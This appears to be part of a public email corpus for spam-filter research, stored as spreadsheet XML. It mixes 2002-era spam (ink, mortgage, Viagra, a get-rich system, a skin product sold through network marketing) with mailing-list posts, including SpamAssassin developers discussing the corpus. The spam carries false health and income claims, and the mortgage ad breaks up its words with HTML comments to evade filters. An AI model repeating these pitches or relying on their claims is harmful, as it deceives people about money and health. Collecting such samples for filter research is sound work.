 font face=3D"Verdana" size=3D"3" color=3D"#000000"&gt;Do
         you Have an Inkjet or Laser Printer?&lt;/font&gt;&lt;/b&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
         &lt;p&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;Yes? The=
 n we can &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFF99"&gt;SAVE&lt;/=
 font&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;
         you &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFF99"&gt;$$$=
 &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt; Money!&lt;/font&gt;&lt;=
 /b&gt;&lt;/p&gt;
         &lt;p&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#FFFFFF"&gt;&lt;font face=3D"Verdana"&gt;Ou=
 r High Quality Ink &amp; Toner Cartridges come
         with a money-back guarantee,&lt;/font&gt; &lt;font face=3D"Verdana"&gt;a 1-yea=
 r
         Warranty*, and get &lt;/font&gt;&lt;/font&gt;&lt;i&gt;&lt;font face=3D"Verdana" size=3D=
 "3" color=3D"#FFFF99"&gt;&lt;u&gt;FREE 3-Day SHIPPING
         &lt;/u&gt;!*&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;p&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;and best=
  of all...They Cost
         &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFF99"&gt; up to =
 80% &lt;/font&gt; &lt;i&gt;&lt;u&gt;&lt;font face=3D"Verdana" color=3D"#FFFF99" size=3D"4"&gt;Less=
 &lt;/font&gt;&lt;/u&gt;&lt;/i&gt;
         &lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;
         than
         Retail Price!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;div align=3D"center"&gt;
           &lt;center&gt;
           &lt;table border=3D"1" width=3D"99%" height=3D"11" bordercolor=3D"#=
 000000"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" bgcolor=3D"#FFFF00" align=3D"center" styl=
 e=3D"color: #FFFFFF" bordercolor=3D"#000000"&gt;
         &lt;p&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#00CC99"&gt;&lt;a style=
 =3D"color: #000000; font-weight: bold" href=3D"http://www.superink.net/"&gt;*=
 Click here
         to visit Our Website!*&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
         &lt;p&gt;&lt;b&gt;&lt;u&gt;&lt;font size=3D"4" color=3D"#FFFFFF"&gt;or Call us Toll-Free @
         1-800-758-8084!&lt;/font&gt;&lt;/u&gt;&lt;/b&gt;
         &lt;p&gt;&lt;font size=3D"1" face=3D"Arial" color=3D"#C0C0C0"&gt;*90-day warra=
 nty on remanufactured
         cartridges. Free shipping on orders over $40&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;br&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;div align=3D"left"&gt;
           &lt;table border=3D"0" width=3D"420" height=3D"42" bgcolor=3D"#0000=
 00"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" height=3D"36" align=3D"center" style=3D"f=
 ont-family: Palatino Linotype; font-size: 8pt; color: #FFFFFF"&gt;&lt;font face=3D=
 "Verdana" size=3D"1" color=3D"#FFFFFF"&gt;You
                 are receiving this special offer because you have provided=
 &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"1" color=3D"#000000"&gt;
                 &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"1" color=3D"#FFFFFF"=
 &gt;
                 permission to receive email communications regarding speci=
 al
                 online promotions or offers. If you feel you have received=
  this
                 message in error, or wish to be removed from our subscribe=
 r
                 list, &lt;a href=3D"mailto:print1@btamail.net.cn" style=3D"co=
 lor: #FF0000"&gt;Click HERE&lt;/a&gt;
                 and then click send, and you will be removed within three =
 business days.
                 Thank You and we apologize for ANY inconvenience.&lt;/font&gt;&lt;/=
 td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] fully-public corpus of mail available 
</t>
  </si>
  <si>
    <t xml:space="preserve">
 (trimmed cc list)
 Daniel Quinlan said:
 &gt; 1. These messages could end up being falsely (or incorrectly) reported
 &gt;    to Razor, DCC, Pyzor, etc.  Certain RBLs too.  I don't think the
 &gt;    results for these distributed tests can be trusted in any way,
 &gt;    shape, or form when running over a public corpus.
 I'll note that in the README.
 &gt; 2. These messages could also be submitted (more than once) to projects
 &gt;    like SpamAssassin that rely on filtering results submission for GA
 &gt;    tuning and development.
 &gt; The second problem could be alleviated somewhat by adding a Nilsimsa
 &gt; signature (or similar) to the mass-check file (the results format used
 &gt; by SpamAssassin) and giving the message files unique names (MD5 or
 &gt; SHA-1 of each file).
 OK; maybe rewriting the message-ids will help here, that should allow
 us to pick them out.  I'll do that.
 &gt; 3. Spammers could adopt elements of the good messages to throw off
 &gt;    filters.  And, of course, there's always progression in technology
 &gt;    (by both spammers and non-spammers).
 &gt; The third problem doesn't really worry me.
 nah, me neither.
 &gt; These problems (and perhaps others I have not identified) are unique
 &gt; to spam filtering.  Compression corpuses and other performance-related
 &gt; corpuses have their own set of problems, of course.
 &gt; 
 &gt; In other words, I don't think there's any replacement for having
 &gt; multiple independent corpuses.  Finding better ways to distribute
 &gt; testing and collate results seems like a more viable long-term solution
 &gt; (and I'm glad we're working on exactly that for SpamAssassin).  If
 &gt; you're going to seriously work on filter development, building a corpus
 &gt; of 10000-50000 messages (half spam/half non-spam) is not really that
 &gt; much work.  If you don't get enough spam, creating multi-technique
 &gt; spamtraps (web, usenet, replying to spam) is pretty easy.  And who
 &gt; doesn't get thousands of non-spam every week?  ;-)
 Yep.  The primary reason I released this, was to provide a good, big
 corpus for academic testing of filter systems; it allows results to
 be compared between filters using a known corpus.
 For SpamAssassin development, everyone has to maintain their own corpus.
 --j.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thursday 25 July 2002 06:16 am, Kylus wrote:
 &gt; Much thanks and my apologies if I come across as a jerk.
 It needed saying.  Thanks for stepping up.
 -- 
 _________________________________________________
 No I Don't Yahoo!
 And I'm getting pretty sick of being asked if I do.
 _________________________________________________
 John Andersen / Juneau Alaska
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: discounted mortgage broker 512517
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;p&gt;Mo&lt;!--mommy--&gt;rtgage R&lt;!--dad--&gt;ates are at an all t&lt;!--lilloipops--&gt;ime low.  We can find AN&lt;!--south of my--&gt;YONE with ANY CRE&lt;!--stopmom--&gt;DIT (great or horrible)
 the lowe&lt;!--nine oclock--&gt;st and most competitive rates.  Simple takes under 1 m&lt;!--pollutes--&gt;inute.
 &lt;p&gt;
 &lt;a href=http://www.requestedinfo.net/cgi-bin/best_rate_virtual.cgi?code=btinh&gt;TRY NOW&lt;/a&gt;
 &lt;p&gt;
 &lt;/html&gt;
 512517
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-10-09
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * Passing the Parrot Pumpkin
     * The Perl Journal On The Ropes
 +--------------------------------------------------------------------+
 | Passing the Parrot Pumpkin                                         |
 |   posted by KM on Tuesday October 08, @09:11 (parrot)              |
 |   http://use.perl.org/article.pl?sid=02/10/08/1311237              |
 +--------------------------------------------------------------------+
 [0]Dan writes "After a good run, Jeff Goff, the current Parrot release
 manager and Keeper of the Keys and Source, is passing on the hat. Let's
 everyone give a big welcome to Steve Fink, who's agreed to take up the
 position." Thanks for the work Jeff... now Steve, get the whip cracking!
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/10/08/1311237
 Links:
     0. http://yetanother.org/dan/
 +--------------------------------------------------------------------+
 | The Perl Journal On The Ropes                                      |
 |   posted by pudge on Tuesday October 08, @14:35 (links)            |
 |   http://use.perl.org/article.pl?sid=02/10/08/1835219              |
 +--------------------------------------------------------------------+
 [0]rochlin writes "Looks like The Perl Journal might not make it up for
 air after all. This blurb is on [1]their website. 'Time is running short
 and we need your help if The Perl Journal is to get another chance at
 being the real deal. As of a couple of minutes ago, we only have 881
 subscriptions and the deadline is fast approaching. Please subscribe now.
 It only costs 3 cents per day to get the best Perl coverage anywhere.'"
 They need 3,000 subscribers to move forward.
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/10/08/1835219
 Links:
     0. http://www.nw-apts.com
     1. http://www.tpj.com/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</si>
  <si>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The Money Control System
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 4.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;The Money Control System&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p align="center"&gt;&lt;span style="BACKGROUND-COLOR: #006699"&gt;&lt;v:shapetype id=_x0000_t136 coordsize = "21600,21600" o:spt = "136" path = 
 " m@7,0 l@8,0 m@5,21600 l@6,21600 e" adj = "10800"&gt;
  &lt;v:formulas&gt;
 &lt;v:f eqn = 
 "sum #0 0 10800 "&gt;
 &lt;/v:f&gt;
 &lt;v:f eqn = "prod #0 2 1 "&gt;
 &lt;/v:f&gt;
 &lt;v:f eqn = 
 "sum 21600 0 @1 "&gt;
 &lt;/v:f&gt;
 &lt;v:f eqn = "sum 0 0 @2 "&gt;
 &lt;/v:f&gt;
 &lt;v:f eqn = 
 "sum 21600 0 @3 "&gt;
 &lt;/v:f&gt;
 &lt;v:f eqn = "if @0 @3 0 "&gt;
 &lt;/v:f&gt;
 &lt;v:f eqn = 
 "if @0 21600 @1 "&gt;
 &lt;/v:f&gt;
 &lt;v:f eqn = "if @0 0 @2 "&gt;
 &lt;/v:f&gt;
 &lt;v:f eqn = 
 "if @0 @4 21600 "&gt;
 &lt;/v:f&gt;
 &lt;v:f eqn = "mid @5 @6 "&gt;
 &lt;/v:f&gt;
 &lt;v:f eqn = 
 "mid @8 @5 "&gt;
 &lt;/v:f&gt;
 &lt;v:f eqn = "mid @7 @8 "&gt;
 &lt;/v:f&gt;
 &lt;v:f eqn = 
 "mid @6 @7 "&gt;
 &lt;/v:f&gt;
 &lt;v:f eqn = "sum @6 0 @5 "&gt;
 &lt;/v:f&gt;
 &lt;/v:formulas&gt;
 &lt;v:path 
 o:connectangles="270,180,90,0" 
 o:connectlocs="@9,0;@10,10800;@11,21600;@12,10800" textpathok = "t" 
 o:connecttype = "custom"&gt;
 &lt;/v:path&gt;
 &lt;v:textpath on = "t" fitshape = 
 "t"&gt;
 &lt;/v:textpath&gt;
 &lt;v:handles&gt;
 &lt;v:h xrange="6629,14971" 
 position="#0,bottomRight"&gt;
 &lt;/v:h&gt;
 &lt;/v:handles&gt;
 &lt;o:lock v:ext="edit" text = "t" 
 shapetype = "t"&gt;
 &lt;/o:lock&gt;
 &lt;/v:shapetype&gt;
 &lt;v:shape id=_x0000_s1051 
 style="WIDTH: 465pt; HEIGHT: 54pt" type = "#_x0000_t136" coordsize = 
 "21600,21600" alt = "THE MONEY CONTROL SYSTEM" fillcolor = "red" strokecolor = 
 "white" strokeweight = "1.5pt" adj = ",10800"&gt;
 &lt;v:fill 
 rotate="t"&gt;
 &lt;/v:fill&gt;
 &lt;v:shadow on = "t" color = "#900"&gt;
 &lt;/v:shadow&gt;
 &lt;v:textpath 
 style="FONT-SIZE: 40pt; FONT-FAMILY: 'Impact'; v-text-kern: t" fitpath = "t" 
 trim = "t" string = 
 "THE MONEY CONTROL SYSTEM"&gt;
 &lt;/v:textpath&gt;
 &lt;/v:shape&gt;
 &lt;/span&gt;&lt;/p&gt;
 &lt;table height="1" cellSpacing="0" cellPadding="0" width="628" align="center" border="0"&gt;
   &lt;tbody&gt;
     &lt;tr&gt;
       &lt;td width="4" height="1"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width="4" bgColor="#006699" height="1"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/tbody&gt;
 &lt;/table&gt;
 &lt;table height="1" cellSpacing="0" cellPadding="0" width="628" align="center" border="0"&gt;
   &lt;tbody&gt;
     &lt;tr&gt;
       &lt;td width="4" height="1"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width="4" bgColor="#000000" height="1"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/tbody&gt;
 &lt;/table&gt;
 &lt;p align="center"&gt;&lt;v:shapetype id=_x0000_t138 coordsize = "21600,21600" o:spt = 
 "138" path = " m0@0 l10800,0,21600@0 m0,21600 l10800,21600,21600,21600 e" adj = 
 "10800"&gt;
 &lt;v:formulas&gt;
 &lt;v:f eqn = "sum #0 0 0 "&gt;
 &lt;/v:f&gt;
 &lt;v:f eqn = 
 "prod #0 1 2 "&gt;
 &lt;/v:f&gt;
 &lt;v:f eqn = "sum @1 10800 0 "&gt;
 &lt;/v:f&gt;
 &lt;v:f eqn = 
 "sum 21600 0 @1 "&gt;
 &lt;/v:f&gt;
 &lt;/v:formulas&gt;
 &lt;v:path o:connectangles="270,180,90,0" 
 o:connectlocs="10800,0;5400,@1;10800,21600;16200,@1" textpathok = "t" 
 o:connecttype = "custom"&gt;
 &lt;/v:path&gt;
 &lt;v:textpath on = "t" fitshape = 
 "t"&gt;
 &lt;/v:textpath&gt;
 &lt;v:handles&gt;
 &lt;v:h position="topLeft,#0" 
 yrange="0,21600"&gt;
 &lt;/v:h&gt;
 &lt;/v:handles&gt;
 &lt;o:lock v:ext="edit" text = "t" shapetype = 
 "t"&gt;
 &lt;/o:lock&gt;
 &lt;/v:shapetype&gt;
 &lt;v:shape id=_x0000_s1044 
 style="WIDTH: 235.5pt; HEIGHT: 42.75pt" type = "#_x0000_t138" coordsize = 
 "21600,21600" alt = "How BIG can you dream?" fillcolor = "yellow" strokecolor = 
 "red" adj = ",5400"&gt;
 &lt;v:fill rotate="t"&gt;
 &lt;/v:fill&gt;
 &lt;v:shadow color = 
 "#868686"&gt;
 &lt;/v:shadow&gt;
 &lt;v:textpath 
 style="FONT-WEIGHT: bold; FONT-SIZE: 28pt; FONT-FAMILY: 'Franklin Gothic Heavy'; v-text-kern: t" 
 fitpath = "t" trim = "t" string = 
 "Live your Dreams!"&gt;
 &lt;/v:textpath&gt;
 &lt;/v:shape&gt;
 &lt;font size="7" color="#FF0000"&gt;The Money Control System&lt;/font&gt; &lt;img height="169" src="http://211.117.193.159/book/home[1].jpg" width="630" border="0"&gt;&lt;br&gt;
 &lt;font face="Arial Black" size="6"&gt;Would your lifestyle change if you had an
 extra $10,000 each and every month? Find out &lt;u&gt;&lt;b&gt;&lt;font color="#3366cc"&gt;&lt;a href="http://211.117.193.159/book/112.htm"&gt;NOW!&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/u&gt;&lt;br&gt;
 &amp;nbsp;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;span style="LETTER-SPACING: 1pt"&gt;&lt;font face="Times New Roman" color="#ff0000" size="6"&gt;The
 Money Control System&lt;/font&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font face="OldCentury" size="4"&gt;How You Can Get Rich, Stay
 Rich &amp;amp; Enjoy Being Rich&lt;br&gt;
 with The Money Control System.&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;u&gt;&lt;i&gt;&lt;b&gt;&lt;font size="5"&gt;Here's what people are saying.&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;/p&gt;
 &lt;div style="BACKGROUND-COLOR: #ffffcc"&gt;
   &lt;p align="center"&gt;&lt;i&gt;&lt;font size="4"&gt;&amp;quot;I don't have any financial
   worries...I can now pursue the interests and&lt;br&gt;
   hobbies and the things I want to do...&amp;quot;&lt;br&gt;
   &lt;br&gt;
   &amp;quot; The mutual funds we are into are rated among the top five...&lt;br&gt;
   we are looking at probably 15%,20% return...&amp;quot;&lt;br&gt;
   &lt;br&gt;
   &amp;quot; My goal was specifically to take the $10,000 that I managed&lt;br&gt;
   to accumulate through savings, invest that and, in a period of&lt;br&gt;
   nine months to a year, come back with at least $15,000.&lt;br&gt;
   I came back with $16,000.&lt;br&gt;
   &lt;br&gt;
   &amp;quot;I Saved In Taxes Alone What I Paid For&lt;br&gt;
   &amp;nbsp;My Kid's First Year of College.&amp;quot;&lt;br&gt;
   &lt;br&gt;
   &amp;quot;Anyone who can learn from Money Control would be crazy to pass up the
   chance. The Control Steps work so well that anyone can become a millionaire.
   I'm not a millionaire yet, but I'm living like one. I call my time my own, and
   work whenever I decide to. I am only 30 years old, so I plan to work another
   five years and retire with the income from a million dollars worth of
   investments. Before The Money Control System&amp;nbsp; showed me the way, I would
   never have believed it possible. Me, a millionaire!&amp;quot;&amp;nbsp;&lt;br&gt;
   &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;&amp;nbsp;
   B.H. Salt Lake City UT&lt;/font&gt;&lt;/i&gt;&lt;/p&gt;
 &lt;/div&gt;
 &lt;p align="center"&gt;&lt;font face="OldCentury" size="4"&gt;&lt;a href="http://211.117.193.159/book/112.htm"&gt;&lt;font color="#0000ff"&gt;&amp;nbsp;CLICK
 HERE TO LEARN MORE AND CHANGE YOUR LIFE!&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: LOOK TEN YRS YOUNGER and get paid for it ! lwl
</t>
  </si>
  <si>
    <t xml:space="preserve">
 GET PAID    for it !
 LOOKING FOR AMBITIOUS LEADERS IN YOUR AREA 
 to market and distribute our NEW, HOT, PATENTED, EXCLUSIVE PRODUCT.Our income opportunity is a once-in-a-lifetime TIMING issue.   IF YOU HAVE A BURNING DESIRE TO CHANGE YOUR FINANCIAL FUTURE  just click at CLICK HERE below and enter   We will immediately send you information sufficient for you to make an educated Business Decision as to whether this is for you or not.  AMBITIOUS LEADERS include your NAME, PHONE NUMBER(S), and the best time of day for us to call for just ONE FOLLOW-UP VISIT, 
 NO HYPE NO OBLIGATIONIntroducing the Look Good Duo. Our EXCLUSIVE
 NEW PATENTED PRODUCT is designed to REPAIR SKIN DAMAGE &amp; REJUVENATE TISSUE! 
 Successfully addresses WRINKLES, DARK CIRCLES, AGE SPOTS, FINE LINES, LESIONS, SPIDER VEINS, SKIN TAGS, SCAR TISSUE, CELLULITE, STRETCH MARKS, and MORE for most people the LookGoodDuo is Hypoallergenic !
 Research, which began many years ago, has concluded that ellagic acid, derived from a compound called ellagitannins, is a very powerful substance. The highest concentration of ellagitannins are found in raspberry seeds. The delivery of the ellagitannins, however, is the key to the effectiveness of the product. We use raspberry seed materials processed using a patented method, which is the ONLY method that guarantees the maximum delivery of available phytoestrogens, polyphenols, and antioxidants. 
 Ellagic acid from raspberry seed ellagitannins is the most powerful and complete polyphenolic, phytoestrogen, antioxidant material yet discovered! These plant based compounds, or phytoestrogens, when absorbed, provide many beneficial effects including stimulation of collagen formation. 
 It is now known that the powerful agents in the raspberry seed materials tone the tiny blood vessels under the eye and decrease the release of the brown chemical pigment. The results are a decrease the appearance of the dark circles under the eyes. These materials also help to decrease the appearance of "AGE" brown spots, while smoothing WRINKLES, strengthening HAIR and NAILS, and supporting many other significant health issues! 
 CELLULITE is simply FAT that is tethered down because certain cells in our skin are stimulated by estrogens. The phytoestrogens, polyphenols, and antioxidants from both ORAL and TOPICAL sources of ellagic acid interfere with that tethering process resulting in a smoother skin surface. 
 We offer this Patented material in both a tablet and a topical cream. Taken both internally and externally, it is easy to understand how they can achieve such obvious results so quickly, working from the inside-out AND from the outside-in.  Happy users report a healthy GLOW which they have never achieved with any other product! 
 PRODUCT TESTIMONIALS 
 I've been using the product for a little over a month. I took the "2 face challenge', and I could tell a difference in only 3 days! The lines on my face and the pores had changed!  I have had people compliment my fingernails. They have been growing like crazy!  C.C., OH
 This is a unique, one of a kind product.   I have been using it 3 weeks and I can truly see a difference in the liver spots on my hands. The prescription from my dermatologist didn't do it, but this product did.  M.F., MS
 I have been watching myself very closely, and since using the product, the brown spots on my hand have just about disappeared. The smile lines and the eyelids have really tightened up. No more problems putting my eyeliner on! The skin under my chin has really tightened up.  This is not hard work, it is just sharing the product with family and friends. I have never been rewarded so quickly and so well.   E.P., CA
 K.D., TX 
 I was queen of skeptical.  I did not want to try this.  I am a 54 yr old grandmother.  I have tried everything for years to get rid of cellulite - the creams, the wraps - nothing worked.  My husband kept telling me to try this.  Finally I did it just to get him off my back.  I had not worn shorts for 5 years.  After about 10 days, my husband started telling me my legs were looking better.  I thought he was just being nice since he got me into this.   Then I went shopping, and in the lights in the dressing room, for the first time in a long time I looked pretty good.  I went into the next dressing room, because I thought the lights were wrong, but I still looked good.  I ended up buying shorts, and have been wearing shorts for the 1st time in 5 years.  Yes, it works!! G.C., TX
 We just had a booth at the womens expo in Dallas.  Out of the 300 or 400 exhibitors there, the only other spot that had the people we did were the ones giving out free food.   V.C., TX
 I did the 1 side of the face test, and I did not tell my spouse that I was doing it.  We went to get some  fast food.  He was looking at me, and said I can tell you which side you are using it on.  Its your right side.  I asked what made him think so, and he said the lines around my mouth and eyes have softened, and the fine lines around my neck.  We are tickled, because everyone we talk to wants it!  J.D., TX 
 After using your product for less than a week, I ran into a friend who asked me what I was doing to look so YOUNG!  I have a full- time job, but I have made $8,000 since starting this business part time!   T.H.,Tx
 ---------------------------------------
 I have found a system that works.  I have 44 people in my group in less than a month! In one month I made over $6,000!  B.M., NH
 ---------------------------------------------------------------
 I am receiving 6 checks a month, and I do not even know where they are coming from!  W.T., TX
 ---------------------------------------------------------------
 I have been in the company 3 weeks, and already have over 20 people in my group.  This is the easiest thing I have ever done.  All I do is tell them my story and give them the hotline number. ---------------------------------------------------------------
 At a restaurant, I went to the restroom with a girlfriend and was telling her about what this product does.  We went back to the table, and in a few minutes 2 women walked up to me.  They said they were in the stalls and overheard us talking, and wanted some of the product.  I gave them a brochure, and noticed they went to 2 different tables.  They weren't even together!  J.M., TX
 --------------------------------------------------------------- 
 ...//WANT A PRODUCT THAT ACTUALLY WORKS BUT CANNOT GET ANYWHERE ELSE??..\\\\
 THIS WILL BE THE FIRST EVER MOVED THROUGH NETWORK MARKETING.STAKE YOUR CLAIM NOW!
 ##########.. CLICK HERE for FREE NO OBLIGATION INFO:.. ###########
 **** mailto:younger10years@yahoo.com?subject=subscribe-Im-Your-Leader ****
 Your email address was obtained from an opt-in list.  If you wish to unsubscribe from this list please Click on reply with remove in the sujectREMOVE ME, below, and Click send.
 xdhjmhoawofjkngdtfesh
</t>
  </si>
  <si>
    <t xml:space="preserve">zzzz@example.com (Justin Mason) writes:
 &gt; /dev/fd/0 is STDIN -- filedescriptor 0.  Looks like the PS file wants
 &gt; to know its filename, but it's being read from STDIN, that's my
 &gt; guess.  
 I don't think so: it should be getting a stream of PS from stdin,
 but it's not. The printing/spooling system is executing gs but
 somehow failing to provide it with input.
 &gt; Try tweaking the scripts to run "gs" with the ps file on
 &gt; the command line instead of as "-".
 That might clarify that the later part of the system works, but I
 suspect the problem is earlier.
 B
 -- 
 Brendan Halpin, Dept of Government and Society, Limerick University, Ireland
 Tel: w +353-61-213147 f +353-61-202569 h +353-61-390476;  Room F2-025 x 3147
 &lt;mailto:brendan.halpin@ul.ie&gt;        &lt;http://wivenhoe.staff8.ul.ie/~brendan&gt;
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ok?????
</t>
  </si>
  <si>
    <t xml:space="preserve">Welcome to Viagra Express!
 http://www.universalmeds.com/main2.php?rx=16863
 Our objective at Viagra Express is simple! We want to provide only 
 genuine FDA approved VIAGRA to you at the lowest possible prices.
 Some important factors that set us apart from our competition:
 * CONFIDENTIAL ONLINE DR. CONSULTATION
 * GLOBAL PHYSICIAN NETWORK OF 200+ LICENSED PHYSICIANS
 * WORLDWIDE 24 HOUR DELIVERY UPON ORDER APPROVAL
 * SIMPLY THE LOWEST PRICES
 * NO-CHARGE FOR ANY ORDER NOT APPROVED FOR ANY REASON
 * DISCRETION ASSURED, SATISFACTION GUARANTEED
  http://www.universalmeds.com/main2.php?rx=16863
  We also carry 4 other products from weight loss to hair loss products.
 ht
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: info-theoretic model of anonymity
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Date: Sat, 3 Aug 2002 05:26:12 +0100
 From: Adam Back &lt;adam@cypherspace.org&gt;
 To: Cypherpunks &lt;cypherpunks@minder.net&gt;
 Cc: Adam Back &lt;adam@cypherspace.org&gt;
 Old-Subject: info-theoretic model of anonymity
 User-Agent: Mutt/1.2.2i
 Subject: info-theoretic model of anonymity
 Sender: owner-cypherpunks@lne.com
 Just read this paper published in PET02 "Towards an Information
 Theoretic Metric for Anonymity" [1]:
 	http://www.cl.cam.ac.uk/~gd216/set.pdf
 or	http://www.cl.cam.ac.uk/~gd216/set.ps
 it uses a Shannon like entropy model for the anonymity provided by a
 system uses this model to analyse the effect of different parameters
 one can tune with mixmaster (POOLSIZE, RATE, in mixmaster.conf).
 The "anonymity entropy" measurement can be interpreted as how many
 bits of information the attacker needs to identify a user and is
 computed from probabilities.
 Would be interesting to try estimate the entropy provided by the
 current mixmaster network.  A number of nodes publish their parameter
 choices, and traffic volume over time (in hourly increments).
 Adam
 --
 http://www.cypherspace.org/adam/
 [1]
 @inproceedings{Serjantov:02:info-theoretic-anon,
   author = "Andrei Serjantov and George Danezis",
   title = "Towards an Information Theoretic Metric for Anonymity",
   booktitle = "Proceedings of the Workshop on Privacy Enhancing Technologies",
   year = "2002",
   note = "Also available as
 \url{http://www.cl.cam.ac.uk/~aas23/papers_aas/set.ps}"
 }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</si>
  <si>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Justin Mason writes:
 &gt; Has anyone figured out what's up with this?  Does someone out there
 &gt; think that FoRK needs some MIME tutoring?
 I was puzzled at first, but I think I understand what happened.
 First, I approved the post because it didn't appear to be spam, even
 though it wasn't from a member.  I thought it was odd that someone
 wanted to send the MIME blurb to the list, but it was not really that
 different from causing the New York Times web site to send a story to
 the list.  (Except that the bits here are antediluvian, but old bits are
 a problem to be solved by social opporobrium, not technical constraints.)
 But I think what actually happened is that some idiot got infected by
 Klez and had both FoRK and the pine-robot autoresponder address in their
 mailbox or addressbook, so Klez forged mail from fork@xent.com to the
 autoresponder, which responded.  To FoRK.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] re: Argh!
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Well, you might be successful too if Arthur Miller had been
 &gt; your father.  Or is this some other movie?
 Nope, that's her. Particularly exciting moments stage managing "The
 Crucible" my senior year when Becky's dad came to see his little girl in
 his play and our male lead fell off the stage. Ahem. The joys of attending
 Choate, where even as high school bloke you can make big mistakes with
 (other peoples') real money.
 &gt; #1 Those of us who are envious of your success as a writer and
 &gt; artist might find this a bit hard to understand.
 Hey, Rick, that's quite nice. Not to demean my own accomplishments, but I
 don't have a &amp;&amp;^*$%&amp;^% film deal, which pays more per hour than I'll make
 in a lifetime of short fiction. OTOH, count my blessings -- I've had
 fourteen stories in print this year, already fifteen more coming next
 year, strong critical reception and my first collection due out this
 coming spring.
 Ah. I feel much better now. Take that, Becky Miller!
 (But I'll bet she drives a nicer car than me.)
 Jay, back to work on the megafelid cranial capacity story
 ---
 "Story Words" - daily microfiction at: http://storyword.blogspot.com/
 Coming soon at blogspot: "Teeth Party -- the Mad Hater and the Dorkmouse"
 ---
 Watch for my upcoming fiction:
